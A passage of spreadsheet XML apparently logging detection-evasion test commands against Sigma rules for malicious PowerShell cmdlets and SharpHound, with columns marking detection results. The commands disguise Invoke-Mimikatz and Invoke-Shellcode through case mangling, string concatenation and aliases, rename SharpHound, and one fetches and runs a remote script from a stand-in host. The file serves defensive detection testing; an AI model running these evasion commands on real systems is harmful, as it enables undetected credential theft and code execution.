          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2942" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2942" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2942" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2942" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2942" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I294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2" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2942" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2943" ht="15.75" customHeight="1" s="42">
      <c r="A2943" s="43" t="n"/>
      <c r="B2943" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2943" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2943" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2943" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAnD "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2943" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2943" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2943" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I294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3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2943" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2944" ht="15.75" customHeight="1" s="42">
      <c r="A2944" s="43" t="n"/>
      <c r="B2944" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2944" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2944" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2944" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMand "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2944" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2944" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2944" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I294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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2944" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2945" ht="15.75" customHeight="1" s="42">
      <c r="A2945" s="43" t="n"/>
      <c r="B2945" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2945" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2945" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2945" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2945" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2945" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2945" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I294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5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2945" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2946" ht="15.75" customHeight="1" s="42">
      <c r="A2946" s="43" t="n"/>
      <c r="B2946" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2946" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2946" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2946" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMANd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2946" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2946" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2946" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I29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6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2946" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2947" ht="15.75" customHeight="1" s="42">
      <c r="A2947" s="43" t="n"/>
      <c r="B2947" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2947" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2947" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2947" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2947" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2947" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2947" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I294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7" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2947" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2948" ht="15.75" customHeight="1" s="42">
      <c r="A2948" s="43" t="n"/>
      <c r="B2948" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2948" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2948" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2948" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2948" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2948" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2948" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I294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8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2948" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2949" ht="15.75" customHeight="1" s="42">
      <c r="A2949" s="43" t="n"/>
      <c r="B2949" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2949" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2949" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2949" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmand "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2949" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2949" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2949" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I294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49" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2949" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2950" ht="15.75" customHeight="1" s="42">
      <c r="A2950" s="43" t="n"/>
      <c r="B2950" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2950" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2950" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2950" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2950" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2950" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2950" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I295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50" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2950" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2951" ht="15.75" customHeight="1" s="42">
      <c r="A2951" s="43" t="n"/>
      <c r="B2951" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2951" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2951" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2951" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2951" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2951" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2951" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I295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51" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2951" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2952" ht="15.75" customHeight="1" s="42">
      <c r="A2952" s="43" t="n"/>
      <c r="B2952" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2952" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2952" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2952" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmanD "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2952" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2952" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2952" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I295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52" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2952" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2953" ht="15.75" customHeight="1" s="42">
      <c r="A2953" s="43" t="n"/>
      <c r="B2953" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2953" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2953" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2953" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaNd "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2953" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2953" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2953" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I295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53" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2953" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2954" ht="15.75" customHeight="1" s="42">
      <c r="A2954" s="43" t="inlineStr">
        <is>
          <t>t1087.002</t>
        </is>
      </c>
      <c r="B2954" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C2954" s="44" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D2954" s="44" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E2954" s="44" t="inlineStr">
        <is>
          <t>copy SharpHound.exe not_suspicious.exe; .\not_suspicious.exe --collectionmethods="All" --domain "contoso.local"</t>
        </is>
      </c>
      <c r="F2954" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2954" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2954" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2954" s="43" t="n"/>
      <c r="J2954" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2954" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2955" ht="15.75" customHeight="1" s="42">
      <c r="A2955" s="43" t="inlineStr">
        <is>
          <t>t1087.002</t>
        </is>
      </c>
      <c r="B2955" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C2955" s="44" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D2955" s="44" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E2955" s="44" t="inlineStr">
        <is>
          <t>copy SharpHound.exe not_suspicious.exe; .\not_suspicious.exe --collectionmethods "Default" --domain "contoso.local" --zipfilename:"data.zip"</t>
        </is>
      </c>
      <c r="F2955" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2955" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2955" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2955" s="44" t="n"/>
      <c r="J2955" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2955" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2956" ht="15.75" customHeight="1" s="42">
      <c r="A2956" s="43" t="inlineStr">
        <is>
          <t>t1087.002</t>
        </is>
      </c>
      <c r="B2956" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C2956" s="44" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D2956" s="44" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E2956" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" SharpHound.exe -jsOnFolDEr C:\temp /"ZipFileName" C:\temp\sharphound.zip</t>
        </is>
      </c>
      <c r="F2956" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2956" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2956" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2956" s="43" t="n"/>
      <c r="J2956" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2956" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2957" ht="15.75" customHeight="1" s="42">
      <c r="A2957" s="43" t="n"/>
      <c r="B2957" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2957" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2957" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2957" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F2957" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2957" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2957" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2957" s="44" t="n"/>
      <c r="J2957" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2957" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2958" ht="15.75" customHeight="1" s="42">
      <c r="A2958" s="43" t="n"/>
      <c r="B2958" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2958" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2958" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2958" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F2958" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2958" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2958" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2958" s="44" t="n"/>
      <c r="J2958" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2958" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2959" ht="15.75" customHeight="1" s="42">
      <c r="A2959" s="43" t="n"/>
      <c r="B2959" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2959" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2959" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2959" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -C "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F2959" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2959" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2959" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2959" s="44" t="n"/>
      <c r="J2959" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2959" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2960" ht="15.75" customHeight="1" s="42">
      <c r="A2960" s="43" t="n"/>
      <c r="B2960" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2960" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2960" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2960" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2960" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2960" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2960" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I296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60" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2960" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2961" ht="15.75" customHeight="1" s="42">
      <c r="A2961" s="43" t="n"/>
      <c r="B2961" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2961" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2961" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2961" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXeCuTioNpOLICY Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2961" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2961" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2961" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I296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61" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2961" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2962" ht="15.75" customHeight="1" s="42">
      <c r="A2962" s="43" t="n"/>
      <c r="B2962" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2962" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2962" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2962" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2962" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2962" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2962" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I29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62" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2962" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2963" ht="15.75" customHeight="1" s="42">
      <c r="A2963" s="43" t="n"/>
      <c r="B2963" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2963" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2963" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2963" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2963" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2963" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2963" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I296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63" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2963" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2964" ht="15.75" customHeight="1" s="42">
      <c r="A2964" s="43" t="n"/>
      <c r="B2964" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2964" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2964" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2964" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXECutIoNpolIcy Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2964" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2964" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2964" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I296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964" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2964" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2965" ht="15.75" customHeight="1" s="42">
      <c r="A2965" s="43" t="n"/>
      <c r="B2965" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2965" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2965" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2965" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -cOmmAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2965" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2965" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2965" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2965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65" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2965" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2966" ht="15.75" customHeight="1" s="42">
      <c r="A2966" s="43" t="n"/>
      <c r="B2966" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2966" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2966" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2966" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMMaND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2966" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2966" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2966" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I296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966" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2966" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2967" ht="15.75" customHeight="1" s="42">
      <c r="A2967" s="43" t="n"/>
      <c r="B2967" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2967" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2967" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2967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2967" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2967" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2967" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2967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67" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2967" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2968" ht="15.75" customHeight="1" s="42">
      <c r="A2968" s="43" t="n"/>
      <c r="B2968" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2968" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2968" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2968" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -nOnINterACTIVe -ep Bypass -COMmAnD "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F2968" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2968" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2968" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2968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68" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2968" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2969" ht="15.75" customHeight="1" s="42">
      <c r="A2969" s="43" t="n"/>
      <c r="B2969" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2969" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2969" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2969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2969" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2969" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2969" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2969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2969" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2969" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2970" ht="15.75" customHeight="1" s="42">
      <c r="A2970" s="43" t="n"/>
      <c r="B2970" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2970" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2970" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2970" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2970" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2970" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2970" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2970" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2970" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2970" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2971" ht="15.75" customHeight="1" s="42">
      <c r="A2971" s="43" t="n"/>
      <c r="B2971" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2971" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2971" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
